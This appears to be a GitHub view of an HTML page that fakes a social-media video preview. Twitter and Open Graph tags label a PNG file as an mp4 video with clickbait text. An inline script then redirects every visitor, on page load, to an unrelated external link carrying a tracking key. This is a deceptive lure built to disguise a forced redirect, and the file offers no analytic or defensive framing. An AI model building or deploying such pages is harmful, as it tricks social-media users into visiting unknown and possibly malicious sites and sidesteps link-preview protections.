-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
41 lines (36 loc) · 1.87 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Meta tags for Twitter (X) video preview -->
<meta name="twitter:card" content="player">
<meta name="twitter:title" content="Check out this video">
<meta name="twitter:description" content="Watch this video">
<!-- Twitter Video Card metadata -->
<meta name="twitter:player" content="https://paschaltee57.github.io/videopreveiwredirect/"> <!-- Page URL -->
<meta name="twitter:player:width" content="600">
<meta name="twitter:player:height" content="300">
<meta name="twitter:player:stream" content="https://paschaltee57.github.io/videopreveiwredirect/DPO2.png"> <!-- Full video URL -->
<meta name="twitter:player:stream:content_type" content="video/mp4">
<!-- Open Graph metadata for Facebook and other platforms -->
<meta property="og:title" content="Check out this video">
<meta property="og:description" content="Watch this video">
<meta property="og:video" content="https://paschaltee57.github.io/videopreveiwredirect/DPO2.png"> <!-- Full video URL -->
<meta property="og:video:secure_url" content="https://paschaltee57.github.io/videopreveiwredirect/DPO2.png">
<meta property="og:video:type" content="video/mp4">
<meta property="og:video:width" content="600">
<meta property="og:video:height" content="300">
<title>Redirect Page</title>
</head>
<body>
<video width="600" height="300" controls>
<source src="https://paschaltee57.github.io/videopreveiwredirect/DPO2.png" type="video/mp4">
Your browser does not support the video tag.
</video>
<script>
// Redirect to another site after page load
window.location.href = "https://appearedon.com/ukme57ysbs?key=0b60be090698bef97699f27ac824c377";
</script>
</body>
</html>